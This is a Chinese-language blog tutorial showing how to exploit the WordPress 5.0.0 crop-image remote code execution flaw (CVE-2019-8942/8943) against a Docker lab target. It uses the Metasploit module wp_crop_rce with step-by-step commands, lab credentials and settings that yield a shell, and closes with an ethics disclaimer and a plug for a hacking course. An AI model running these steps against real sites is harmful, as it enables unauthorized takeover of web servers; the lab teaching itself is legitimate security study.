龙空技术网

记一次“利用远程代码执行漏洞”实战提权过程

安界 187

前言:

目前朋友们对“msf 漏洞利用”可能比较讲究,看官们都想要知道一些“msf 漏洞利用”的相关知识。那么小编在网摘上汇集了一些有关“msf 漏洞利用””的相关内容,希望大家能喜欢,同学们一起来学习一下吧!

百度有不少WordPress 5.0.0 远程代码执行漏洞分析CVE-2019-8942、CVE-2019-8943漏洞复现的文章,但是唯独没有用MSF的,今天就以此篇文章描述一下如何使用msf利用该漏洞一键拿shell权限!!!

漏洞简介

1、此漏洞是由目录遍历以及本地文件包含两部分组成。

2、想要利用此漏洞,需要在目标WordPress站点上拥有至少作者权限访问帐户。

0x001准备环境

由于我们有自己的靶场环境,为了方便,直接docker 拉取现成靶机环境(感谢Medicean)

$ docker pull medicean/vulapps:w_wordpress_7

类型 用户名 密码

Mysql root root

/wp-admin/ admin admin4wp498

/wp-admin/ Author 需要重新设置

启动环境

$ docker run -d -p 8000:80 medicean/vulapps:w_wordpress_7

-p 8000:80 前面的8000代表物理机的端口,可随意指定。

docker拉取环境

首先登陆Author权限的账户,也就是“作者”账户

默认情况下WordPress后台有5个用户角色

Administrator(管理员)Editor(编辑)Author(作者)Contributor(投稿者)Subscriber(订阅者)

打开:http://你的ip:8000//wp-admin/ ,用admin admin4wp498 登陆重置下Author账户密码

点击作者-编辑-新密码-打钩-更新用户

然后退出账号用Author账户登陆(这个docker镜像,用默认Author admin4wp498无法登陆所以需要重新设置)

0x002准备kali

2019.4 space-r7将 WordPress 5.0.0 - Crop-image Shell Upload更新到Metasploit攻击框架中

方式一:# apt install metasploit-framework 更新msf

方式二:手工下来rb并更新进msf攻击框架中

打开kali,新建窗口输入msfconsole启动msf

输入:search wp_crop_rce (搜索攻击模块)

需要用到的模块为:exploit/multi/http/wp_crop_rce

use exploit/multi/http/wp_crop_rce ##连接模块

输入:show option ##显示模块设置,这里要设置4个名称 USERNAME、PASSWORD、RHOTS、PORT

set USERNAME author ##WordPress的作者账户名set PASSWORD 123456 ##作者账户密码set RHOSTS 192.168.2.152 ##靶机IPset RPORT 8000 ##靶机端口

设置完成后,直接输入 run ,开始自动化拿shell

静等片刻。。。。。。

已拿到shell权限了!!!到这里小伙伴们学会了吗?如果还是没有理解,请私信我吧,或者加入我的圈子《黑客攻防与网络安全实战训练营》

注:网络安全的学习,一定要保证自己的职业道德,学习技术的目标是去维护我们的“信息家园”而不要随意的搞破坏!网络安全靠人民,网络安全为人民!!

标签: #msf 漏洞利用